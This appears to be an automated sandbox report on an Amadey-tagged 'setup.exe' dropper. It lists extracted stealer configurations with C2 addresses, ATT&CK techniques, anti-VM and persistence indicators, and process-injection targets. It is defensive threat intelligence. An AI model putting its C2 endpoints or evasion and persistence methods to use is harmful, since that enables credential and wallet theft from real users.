amadey | a45ae63ea9a20aecf8c1ae140824ed2f184d1777114ea4d604426bb6c0bff7cc

Analysis

max time kernel
274s
max time network
277s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
29-06-2024 19:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

archive/setup.exe
Size

792.5MB
MD5

ba080efe457d65936a33e95d834ca631
SHA1

38809c74840485a543ce6edfcfdc40edccc49363
SHA256

81fc1a37b9f0c25769846f121cfdd84bc3c11a03d6c32f021e133367f1e62980
SHA512

d1609c57e2a69e8871872543ddc22bbf9848a7537872ba335006c0936f0c39172ccf1b44ee1a1010e1791e952c2c682eea9a88ee396867658f5e3651885db470
SSDEEP

98304:vlEjneSvhKnC2P8Xscel5cIjAQrH5Lq1d2ITjeAWY/8J:tCZJKR8velaIjVq1d2oeBl

Malware Config

Extracted

Family

risepro

191.101.209.39

77.105.133.27

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

77.105.135.107:3445

Extracted

Family

stealc

Botnet

default

http://85.28.47.4

Attributes

url_path
/920475a59bac849d.php

Extracted

Family

amadey

Version

4.30

Botnet

4dd39d

http://77.91.77.82

Attributes

install_dir
ad40971b6b
install_file
explorti.exe
strings_key
a434973ad22def7137dbb5e059b7081e
url_paths
/Hun4Ko/index.php

rc4.plain

Extracted

Family

lumma

https://potterryisiw.shop/api

https://contintnetksows.shop/api

https://reinforcedirectorywd.shop/api

https://groundsmooors.shop/api

https://foodypannyjsud.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma
Modifies firewall policy service 3 TTPs 1 IoCs
evasion

Modify Registry
T1112

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

setup.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" setup.exe
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
RedLine payload 1 IoCs

Processes:

resource yara_rule

behavioral8/memory/2512-428-0x0000000000400000-0x0000000000450000-memory.dmp family_redline
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	setup.exe

resource	yara_rule
behavioral8/memory/2512-428-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

explorti.exeexplorti.exeexplorti.exeSWKM3BZCcIHViuMlWB_ItJtR.exeIDAAFBGDBK.exeexplorti.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	SWKM3BZCcIHViuMlWB_ItJtR.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	IDAAFBGDBK.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe

Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

347 1752 rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.EXEpowershell.exepowershell.EXEpowershell.exe

pid process

3484 powershell.exe
2076 powershell.exe
3580 powershell.EXE
4956 powershell.exe
4924 powershell.EXE
4416 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

flow	pid	process
347	1752	rundll32.exe

pid	process
3484	powershell.exe
2076	powershell.exe
3580	powershell.EXE
4956	powershell.exe
4924	powershell.EXE
4416	powershell.exe

Checks BIOS information in registry 2 TTPs 15 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

IDAAFBGDBK.exeexplorti.exeexplorti.exeSWKM3BZCcIHViuMlWB_ItJtR.exeInstall.exeexplorti.exeexplorti.exeInstall.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	IDAAFBGDBK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	SWKM3BZCcIHViuMlWB_ItJtR.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	IDAAFBGDBK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SWKM3BZCcIHViuMlWB_ItJtR.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 12 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.execmd.exeInstall.exeq7psGQ3aiTk_B1mfefLThniX.exepolaris.exeS8foXdS7HYSMtBrHz1ZrPeP5.exeIDAAFBGDBK.exeexplorti.exeRegAsm.exeEewdQlg.exesetup.exeIxRRkPx.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	q7psGQ3aiTk_B1mfefLThniX.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	polaris.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	S8foXdS7HYSMtBrHz1ZrPeP5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	IDAAFBGDBK.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	explorti.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	EewdQlg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	IxRRkPx.exe

Drops startup file 1 IoCs

Processes:

SWKM3BZCcIHViuMlWB_ItJtR.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk SWKM3BZCcIHViuMlWB_ItJtR.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk	SWKM3BZCcIHViuMlWB_ItJtR.exe

Executes dropped EXE 38 IoCs

Processes:

PuMRANaFeo3cGudQytaFcnzh.exeq7psGQ3aiTk_B1mfefLThniX.exe6J_fcmCVLn9KieKbpsZvL30J.exeNJwFp4moOVCLFNHiDa5bIGzw.exe3x7B5KMTGyQ8p8HaByXtiLCL.exeSWKM3BZCcIHViuMlWB_ItJtR.exemibSk5BFjCa4UGEw0tal2yQC.exeS8foXdS7HYSMtBrHz1ZrPeP5.exeGsSlVKj1HY8eSYR0r_a6kCV6.exeeb8oCAqj4BdwdiLJp_sYHpSG.exeeb8oCAqj4BdwdiLJp_sYHpSG.tmpInstall.exevkfreeaudiosaver32_64.exeInstall.exevkfreeaudiosaver32_64.exeInstall.exeInstall.exepolaris.exe3VugNwJeQs8ly7yqDYO4mKWh.exepokafdw.exeIDAAFBGDBK.exeexplorti.exeeqtpkqwqodik.exe9eaefd5738.exeCAFBGHIDBG.exeFCFBAKJDBK.exeHIDHDAAEHI.exewFKORKUUomDpdfJYw8c2.exerxYWvuYz0iK83W5tIP0y.exeZuSySbAJBbxTdwKngmmZ.exeQodMliwi0wNIw5fk4qWX.exeInstall.exeexplorti.exeInstall.exeEewdQlg.exeIxRRkPx.exeexplorti.exeexplorti.exe

pid	process
4272	PuMRANaFeo3cGudQytaFcnzh.exe
4488	q7psGQ3aiTk_B1mfefLThniX.exe
4656	6J_fcmCVLn9KieKbpsZvL30J.exe
3820	NJwFp4moOVCLFNHiDa5bIGzw.exe
2200	3x7B5KMTGyQ8p8HaByXtiLCL.exe
1012	SWKM3BZCcIHViuMlWB_ItJtR.exe
5020	mibSk5BFjCa4UGEw0tal2yQC.exe
1496	S8foXdS7HYSMtBrHz1ZrPeP5.exe
1528	GsSlVKj1HY8eSYR0r_a6kCV6.exe
2336	eb8oCAqj4BdwdiLJp_sYHpSG.exe
1708	eb8oCAqj4BdwdiLJp_sYHpSG.tmp
4620	Install.exe
4876	vkfreeaudiosaver32_64.exe
2088	Install.exe
4868	vkfreeaudiosaver32_64.exe
4672	Install.exe
2012	Install.exe
4616	polaris.exe
4568	3VugNwJeQs8ly7yqDYO4mKWh.exe
3656	pokafdw.exe
2200	IDAAFBGDBK.exe
3412	explorti.exe
4316	eqtpkqwqodik.exe
3628	9eaefd5738.exe
4896	CAFBGHIDBG.exe
4444	FCFBAKJDBK.exe
1268	HIDHDAAEHI.exe
456	wFKORKUUomDpdfJYw8c2.exe
652	rxYWvuYz0iK83W5tIP0y.exe
968	ZuSySbAJBbxTdwKngmmZ.exe
1960	QodMliwi0wNIw5fk4qWX.exe
3688	Install.exe
4276	explorti.exe
3208	Install.exe
3656	EewdQlg.exe
4864	IxRRkPx.exe
3780	explorti.exe
2216	explorti.exe

Identifies Wine through registry keys 2 TTPs 5 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

IDAAFBGDBK.exeexplorti.exeexplorti.exeexplorti.exeexplorti.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	IDAAFBGDBK.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	explorti.exe

Loads dropped DLL 4 IoCs

Processes:

eb8oCAqj4BdwdiLJp_sYHpSG.tmpS8foXdS7HYSMtBrHz1ZrPeP5.exerundll32.exe

pid process

1708 eb8oCAqj4BdwdiLJp_sYHpSG.tmp
1496 S8foXdS7HYSMtBrHz1ZrPeP5.exe
1496 S8foXdS7HYSMtBrHz1ZrPeP5.exe
1752 rundll32.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
1708	eb8oCAqj4BdwdiLJp_sYHpSG.tmp
1496	S8foXdS7HYSMtBrHz1ZrPeP5.exe
1496	S8foXdS7HYSMtBrHz1ZrPeP5.exe
1752	rundll32.exe

Themida packer 9 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral8/memory/1012-213-0x0000000000470000-0x0000000000DFF000-memory.dmp	themida
C:\Users\Admin\Documents\SimpleAdobe\SWKM3BZCcIHViuMlWB_ItJtR.exe	themida
behavioral8/memory/1012-226-0x0000000000470000-0x0000000000DFF000-memory.dmp	themida
behavioral8/memory/1012-229-0x0000000000470000-0x0000000000DFF000-memory.dmp	themida
behavioral8/memory/1012-242-0x0000000000470000-0x0000000000DFF000-memory.dmp	themida
behavioral8/memory/1012-241-0x0000000000470000-0x0000000000DFF000-memory.dmp	themida
behavioral8/memory/1012-227-0x0000000000470000-0x0000000000DFF000-memory.dmp	themida
behavioral8/memory/1012-228-0x0000000000470000-0x0000000000DFF000-memory.dmp	themida
behavioral8/memory/1012-853-0x0000000000470000-0x0000000000DFF000-memory.dmp	themida

Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 141.98.234.31
VMProtect packed file 1 IoCs
Detects executables packed with VMProtect commercial packer.
vmprotect

Processes:

resource yara_rule

C:\Users\Admin\AppData\Local\Temp\RarSFX1\pokafdw.exe vmprotect

description	ioc
Destination IP	141.98.234.31

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX1\pokafdw.exe	vmprotect

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

RegAsm.exeSWKM3BZCcIHViuMlWB_ItJtR.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\\AdobeUpdaterV168.exe"	RegAsm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8 = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\\AdobeUpdaterV168.exe"	RegAsm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\\AdobeUpdaterV168.exe"	RegAsm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV168_b055341c05e33d6c2334ce6d41cea915 = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV168_b055341c05e33d6c2334ce6d41cea915\\AdobeUpdaterV168.exe"	RegAsm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe"	SWKM3BZCcIHViuMlWB_ItJtR.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

SWKM3BZCcIHViuMlWB_ItJtR.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SWKM3BZCcIHViuMlWB_ItJtR.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	SWKM3BZCcIHViuMlWB_ItJtR.exe

Drops Chrome extension 3 IoCs

Processes:

EewdQlg.exeIxRRkPx.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	EewdQlg.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	EewdQlg.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	IxRRkPx.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

EewdQlg.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini EewdQlg.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

149 iplogger.org
50 bitbucket.org
57 bitbucket.org
67 bitbucket.org
86 bitbucket.org
148 iplogger.org
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

253 ipinfo.io
282 ipinfo.io
283 ipinfo.io
14 api.myip.com
17 api.myip.com
19 ipinfo.io
20 ipinfo.io
252 ipinfo.io
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

4948 powercfg.exe
3672 powercfg.exe
2516 powercfg.exe
3724 powercfg.exe
4184 powercfg.exe
3196 powercfg.exe
456 powercfg.exe
924 powercfg.exe

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	EewdQlg.exe

flow	ioc
149	iplogger.org
50	bitbucket.org
57	bitbucket.org
67	bitbucket.org
86	bitbucket.org
148	iplogger.org

flow	ioc
253	ipinfo.io
282	ipinfo.io
283	ipinfo.io
14	api.myip.com
17	api.myip.com
19	ipinfo.io
20	ipinfo.io
252	ipinfo.io

pid	process
4948	powercfg.exe
3672	powercfg.exe
2516	powercfg.exe
3724	powercfg.exe
4184	powercfg.exe
3196	powercfg.exe
456	powercfg.exe
924	powercfg.exe

Drops file in System32 directory 39 IoCs

Processes:

setup.exepowershell.exepowershell.exeEewdQlg.exeInstall.exepowershell.exepowershell.exeIxRRkPx.exepowershell.exeInstall.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy	setup.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9	EewdQlg.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848	EewdQlg.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9	EewdQlg.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	IxRRkPx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	EewdQlg.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	setup.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	setup.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199	EewdQlg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

Processes:

SWKM3BZCcIHViuMlWB_ItJtR.exeS8foXdS7HYSMtBrHz1ZrPeP5.exeIDAAFBGDBK.exeexplorti.exe9eaefd5738.exeexplorti.exeexplorti.exeexplorti.exe

pid	process
1012	SWKM3BZCcIHViuMlWB_ItJtR.exe
1496	S8foXdS7HYSMtBrHz1ZrPeP5.exe
1496	S8foXdS7HYSMtBrHz1ZrPeP5.exe
1496	S8foXdS7HYSMtBrHz1ZrPeP5.exe
2200	IDAAFBGDBK.exe
3412	explorti.exe
3628	9eaefd5738.exe
4276	explorti.exe
3780	explorti.exe
2216	explorti.exe

Suspicious use of SetThreadContext 13 IoCs

Processes:

3x7B5KMTGyQ8p8HaByXtiLCL.exemibSk5BFjCa4UGEw0tal2yQC.exe3VugNwJeQs8ly7yqDYO4mKWh.exeeqtpkqwqodik.exeGsSlVKj1HY8eSYR0r_a6kCV6.exeCAFBGHIDBG.exeHIDHDAAEHI.exeQodMliwi0wNIw5fk4qWX.exerxYWvuYz0iK83W5tIP0y.exewFKORKUUomDpdfJYw8c2.exeFCFBAKJDBK.exeZuSySbAJBbxTdwKngmmZ.exe

description	pid	process	target process
PID 2200 set thread context of 2512	2200	3x7B5KMTGyQ8p8HaByXtiLCL.exe	MSBuild.exe
PID 5020 set thread context of 1820	5020	mibSk5BFjCa4UGEw0tal2yQC.exe	MSBuild.exe
PID 4568 set thread context of 3584	4568	3VugNwJeQs8ly7yqDYO4mKWh.exe	MSBuild.exe
PID 4316 set thread context of 4516	4316	eqtpkqwqodik.exe	conhost.exe
PID 4316 set thread context of 1372	4316	eqtpkqwqodik.exe	svchost.exe
PID 1528 set thread context of 2656	1528	GsSlVKj1HY8eSYR0r_a6kCV6.exe	BitLockerToGo.exe
PID 4896 set thread context of 5052	4896	CAFBGHIDBG.exe	RegAsm.exe
PID 1268 set thread context of 756	1268	HIDHDAAEHI.exe	RegAsm.exe
PID 1960 set thread context of 2352	1960	QodMliwi0wNIw5fk4qWX.exe	RegAsm.exe
PID 652 set thread context of 4556	652	rxYWvuYz0iK83W5tIP0y.exe	RegAsm.exe
PID 456 set thread context of 948	456	wFKORKUUomDpdfJYw8c2.exe	RegAsm.exe
PID 4444 set thread context of 1564	4444	FCFBAKJDBK.exe	RegAsm.exe
PID 968 set thread context of 4556	968	ZuSySbAJBbxTdwKngmmZ.exe	RegAsm.exe

Drops file in Program Files directory 26 IoCs

Processes:

EewdQlg.exeIxRRkPx.exe

description	ioc	process
